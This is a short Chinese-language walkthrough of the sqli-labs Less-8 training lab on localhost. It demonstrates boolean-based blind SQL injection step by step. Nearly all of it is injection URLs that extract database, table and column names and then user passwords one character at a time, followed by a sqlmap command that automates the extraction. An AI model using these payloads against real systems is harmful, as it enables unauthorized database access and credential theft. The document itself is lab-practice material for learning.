一、输入id,页面正常
http://127.0.0.1/sqli-labs-master/Less-8/?id=1
二、判断闭合方式以及注入方式
1.添加单引号,显示错误页面且无报错信息
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
2.添加注释符,页面正常显示,则闭合方式为单引号
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'--+
3.由于没显示错误信息,所以选择盲注,这关提示用布尔盲注
三、判断数据库数量,等于6时页面显示正常,说明有6个数据库
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(schema_name) from information_schema.schemata)=6 --+
#更改limit来切换要爆破的数据库
#更改substr函数的第二个参数,来确定爆破某一数据库名的第几位字母
#用ascii函数判断时,可先用大于号小于号判断范围,再用等于号确定
四、爆数据库,逐位猜测,如果判断正确页面会正常显示,判断错误就显示非正常页面
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105--+
五、判断某一数据库表的数量
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')>3 --+
六、爆表名,逐位猜测
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+
七、判断某一表的列数
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_name='users')>5 --+
八、爆列名,逐位猜测
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>80--+
九、判断某一列有多少行数据
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(username) from users)>16--+
十、爆数据,逐位猜测
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select password from users limit 0,1),1,1))=50--+
用盲注的方法手动注入比较耗时,可使用sqlmap进行自动注入
爆数据库
python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" -batch -dbms mysql -dbs
over~